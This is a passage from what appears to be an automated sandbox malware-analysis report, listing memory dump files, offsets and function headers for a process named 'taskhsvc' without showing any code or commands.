    • Associated: 00000013.00000002.1855155118.0028B000.00000080.sdmp
    • Associated: 00000013.00000002.1855168257.0028C000.00000040.sdmp
    • Associated: 00000013.00000002.1855182515.0028D000.00000080.sdmp
    • Associated: 00000013.00000002.1855196147.00290000.00000040.sdmp
    • Associated: 00000013.00000002.1855225498.002D3000.00000080.sdmp
    • Associated: 00000013.00000002.1855239885.002D4000.00000040.sdmp
    • Associated: 00000013.00000002.1855254056.002D6000.00000080.sdmp
    • Associated: 00000013.00000002.1855272578.002D7000.00000040.sdmp
    • Associated: 00000013.00000002.1855294963.002D8000.00000080.sdmp
    • Associated: 00000013.00000002.1855305598.002D9000.00000040.sdmp
    • Associated: 00000013.00000002.1855317495.002DA000.00000080.sdmp
    • Associated: 00000013.00000002.1855329417.002DC000.00000040.sdmp
    • Associated: 00000013.00000002.1855351346.00348000.00000080.sdmp
    • Associated: 00000013.00000002.1855370256.003BA000.00000040.sdmp
    • Associated: 00000013.00000002.1855382391.003C3000.00000080.sdmp
    • Associated: 00000013.00000002.1855395021.003C4000.00000040.sdmp
    • Associated: 00000013.00000002.1855406286.003C6000.00000080.sdmp
    • Associated: 00000013.00000002.1855419002.003CA000.00000040.sdmp
    • Associated: 00000013.00000002.1855435469.003CC000.00000080.sdmp
    • Associated: 00000013.00000002.1855447997.003CE000.00000040.sdmp
    • Associated: 00000013.00000002.1855459106.003CF000.00000080.sdmp
    • Associated: 00000013.00000002.1855472726.003D0000.00000040.sdmp
    • Associated: 00000013.00000002.1855490051.003D3000.00000080.sdmp
    • Associated: 00000013.00000002.1855500813.003D4000.00000040.sdmp
    • Associated: 00000013.00000002.1855512417.003D8000.00000080.sdmp
    • Associated: 00000013.00000002.1855523270.003D9000.00000040.sdmp
    • Associated: 00000013.00000002.1855533374.003E0000.00000080.sdmp
    • Associated: 00000013.00000002.1855544480.003E1000.00000040.sdmp
    • Associated: 00000013.00000002.1855556363.003E4000.00000080.sdmp
    • Associated: 00000013.00000002.1855569787.003E5000.00000040.sdmp
    • Associated: 00000013.00000002.1855588250.003F6000.00000080.sdmp
    • Associated: 00000013.00000002.1855603610.003FE000.00000004.sdmp
    • Associated: 00000013.00000002.1855617063.003FF000.00000008.sdmp
    • Associated: 00000013.00000002.1855627940.00400000.00000004.sdmp
    • Associated: 00000013.00000002.1855639237.00402000.00000008.sdmp
    • Associated: 00000013.00000002.1855664504.00403000.00000004.sdmp
    • Associated: 00000013.00000002.1855675077.00405000.00000008.sdmp
    • Associated: 00000013.00000002.1855685431.0040B000.00000004.sdmp
    • Associated: 00000013.00000002.1855695362.0040C000.00000002.sdmp
    • Associated: 00000013.00000002.1855714597.0049D000.00000004.sdmp
    • Associated: 00000013.00000002.1855722372.004A3000.00000008.sdmp
    • Associated: 00000013.00000002.1855730014.004A8000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_19_2_1c0000_taskhsvc.jbxd
    Function 001D3254, Relevance: 1.5, APIs: 1, Instructions: 8
    APIs
    Memory Dump Source
    • Source File: 00000013.00000002.1855040395.001CA000.00000040.sdmp, Offset: 001C0000, based on PE: true
    • Associated: 00000013.00000002.1854999429.001C0000.00000002.sdmp
    • Associated: 00000013.00000002.1855013399.001C1000.00000020.sdmp
    • Associated: 00000013.00000002.1855026342.001C9000.00000080.sdmp
    • Associated: 00000013.00000002.1855065746.00225000.00000080.sdmp
    • Associated: 00000013.00000002.1855077166.00228000.00000040.sdmp
    • Associated: 00000013.00000002.1855089255.0022F000.00000080.sdmp
    • Associated: 00000013.00000002.1855104216.00230000.00000040.sdmp
    • Associated: 00000013.00000002.1855122824.00266000.00000080.sdmp
    • Associated: 00000013.00000002.1855138358.00267000.00000040.sdmp
    • Associated: 00000013.00000002.1855155118.0028B000.00000080.sdmp
    • Associated: 00000013.00000002.1855168257.0028C000.00000040.sdmp
    • Associated: 00000013.00000002.1855182515.0028D000.00000080.sdmp
    • Associated: 00000013.00000002.1855196147.00290000.00000040.sdmp
    • Associated: 00000013.00000002.1855225498.002D3000.00000080.sdmp
    • Associated: 00000013.00000002.1855239885.002D4000.00000040.sdmp
    • Associated: 00000013.00000002.1855254056.002D6000.00000080.sdmp
    • Associated: 00000013.00000002.1855272578.002D7000.00000040.sdmp
    • Associated: 00000013.00000002.1855294963.002D8000.00000080.sdmp
    • Associated: 00000013.00000002.1855305598.002D9000.00000040.sdmp
    • Associated: 00000013.00000002.1855317495.002DA000.00000080.sdmp
    • Associated: 00000013.00000002.1855329417.002DC000.00000040.sdmp
    • Associated: 00000013.00000002.1855351346.00348000.00000080.sdmp
    • Associated: 00000013.00000002.1855370256.003BA000.00000040.sdmp
    • Associated: 00000013.00000002.1855382391.003C3000.00000080.sdmp
    • Associated: 00000013.00000002.1855395021.003C4000.00000040.sdmp
    • Associated: 00000013.00000002.1855406286.003C6000.00000080.sdmp
    • Associated: 00000013.00000002.1855419002.003CA000.00000040.sdmp
    • Associated: 00000013.00000002.1855435469.003CC000.00000080.sdmp
    • Associated: 00000013.00000002.1855447997.003CE000.00000040.sdmp
    • Associated: 00000013.00000002.1855459106.003CF000.00000080.sdmp
    • Associated: 00000013.00000002.1855472726.003D0000.00000040.sdmp
    • Associated: 00000013.00000002.1855490051.003D3000.00000080.sdmp
    • Associated: 00000013.00000002.1855500813.003D4000.00000040.sdmp
    • Associated: 00000013.00000002.1855512417.003D8000.00000080.sdmp
    • Associated: 00000013.00000002.1855523270.003D9000.00000040.sdmp
    • Associated: 00000013.00000002.1855533374.003E0000.00000080.sdmp
    • Associated: 00000013.00000002.1855544480.003E1000.00000040.sdmp
    • Associated: 00000013.00000002.1855556363.003E4000.00000080.sdmp
    • Associated: 00000013.00000002.1855569787.003E5000.00000040.sdmp
    • Associated: 00000013.00000002.1855588250.003F6000.00000080.sdmp
    • Associated: 00000013.00000002.1855603610.003FE000.00000004.sdmp
    • Associated: 00000013.00000002.1855617063.003FF000.00000008.sdmp
    • Associated: 00000013.00000002.1855627940.00400000.00000004.sdmp
    • Associated: 00000013.00000002.1855639237.00402000.00000008.sdmp
    • Associated: 00000013.00000002.1855664504.00403000.00000004.sdmp
    • Associated: 00000013.00000002.1855675077.00405000.00000008.sdmp
    • Associated: 00000013.00000002.1855685431.0040B000.00000004.sdmp
    • Associated: 00000013.00000002.1855695362.0040C000.00000002.sdmp
    • Associated: 00000013.00000002.1855714597.0049D000.00000004.sdmp
    • Associated: 00000013.00000002.1855722372.004A3000.00000008.sdmp
    • Associated: 00000013.00000002.1855730014.004A8000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_19_2_1c0000_taskhsvc.jbxd
    Function 001C53CA, Relevance: 1.5, APIs: 1, Instructions: 7
    APIs
    Memory Dump Source
    • Source File: 00000013.00000002.1855013399.001C1000.00000020.sdmp, Offset: 001C0000, based on PE: true
    • Associated: 00000013.00000002.1854999429.001C0000.00000002.sdmp
    • Associated: 00000013.00000002.1855026342.001C9000.00000080.sdmp
    • Associated: 00000013.00000002.1855040395.001CA000.00000040.sdmp
    • Associated: 00000013.00000002.1855065746.00225000.00000080.sdmp
    • Associated: 00000013.00000002.1855077166.00228000.00000040.sdmp
    • Associated: 00000013.00000002.1855089255.0022F000.00000080.sdmp
    • Associated: 00000013.00000002.1855104216.00230000.00000040.sdmp
    • Associated: 00000013.00000002.1855122824.00266000.00000080.sdmp
    • Associated: 00000013.00000002.1855138358.00267000.00000040.sdmp
    • Associated: 00000013.00000002.1855155118.0028B000.00000080.sdmp
    • Associated: 00000013.00000002.1855168257.0028C000.00000040.sdmp
    • Associated: 00000013.00000002.1855182515.0028D000.00000080.sdmp
    • Associated: 00000013.00000002.1855196147.00290000.00000040.sdmp
    • Associated: 00000013.00000002.1855225498.002D3000.00000080.sdmp
    • Associated: 00000013.00000002.1855239885.002D4000.00000040.sdmp
    • Associated: 00000013.00000002.1855254056.002D6000.00000080.sdmp
    • Associated: 00000013.00000002.1855272578.002D7000.00000040.sdmp
    • Associated: 00000013.00000002.1855294963.002D8000.00000080.sdmp
    • Associated: 00000013.00000002.1855305598.002D9000.00000040.sdmp
    • Associated: 00000013.00000002.1855317495.002DA000.00000080.sdmp
    • Associated: 00000013.00000002.1855329417.002DC000.00000040.sdmp
    • Associated: 00000013.00000002.1855351346.00348000.00000080.sdmp
    • Associated: 00000013.00000002.1855370256.003BA000.00000040.sdmp
    • Associated: 00000013.00000002.1855382391.003C3000.00000080.sdmp
    • Associated: 00000013.00000002.1855395021.003C4000.00000040.sdmp
    • Associated: 00000013.00000002.1855406286.003C6000.00000080.sdmp
    • Associated: 00000013.00000002.1855419002.003CA000.00000040.sdmp
    • Associated: 00000013.00000002.1855435469.003CC000.00000080.sdmp
    • Associated: 00000013.00000002.1855447997.003CE000.00000040.sdmp
    • Associated: 00000013.00000002.1855459106.003CF000.00000080.sdmp
    • Associated: 00000013.00000002.1855472726.003D0000.00000040.sdmp
    • Associated: 00000013.00000002.1855490051.003D3000.00000080.sdmp
    • Associated: 00000013.00000002.1855500813.003D4000.00000040.sdmp
    • Associated: 00000013.00000002.1855512417.003D8000.00000080.sdmp
    • Associated: 00000013.00000002.1855523270.003D9000.00000040.sdmp
    • Associated: 00000013.00000002.1855533374.003E0000.00000080.sdmp
    • Associated: 00000013.00000002.1855544480.003E1000.00000040.sdmp
    • Associated: 00000013.00000002.1855556363.003E4000.00000080.sdmp
    • Associated: 00000013.00000002.1855569787.003E5000.00000040.sdmp
    • Associated: 00000013.00000002.1855588250.003F6000.00000080.sdmp
    • Associated: 00000013.00000002.1855603610.003FE000.00000004.sdmp
    • Associated: 00000013.00000002.1855617063.003FF000.00000008.sdmp
    • Associated: 00000013.00000002.1855627940.00400000.00000004.sdmp
    • Associated: 00000013.00000002.1855639237.00402000.00000008.sdmp
    • Associated: 00000013.00000002.1855664504.00403000.00000004.sdmp
    • Associated: 00000013.00000002.1855675077.00405000.00000008.sdmp
    • Associated: 00000013.00000002.1855685431.0040B000.00000004.sdmp
    • Associated: 00000013.00000002.1855695362.0040C000.00000002.sdmp
    • Associated: 00000013.00000002.1855714597.0049D000.00000004.sdmp
    • Associated: 00000013.00000002.1855722372.004A3000.00000008.sdmp
    • Associated: 00000013.00000002.1855730014.004A8000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_19_2_1c0000_taskhsvc.jbxd

    Non-executed Functions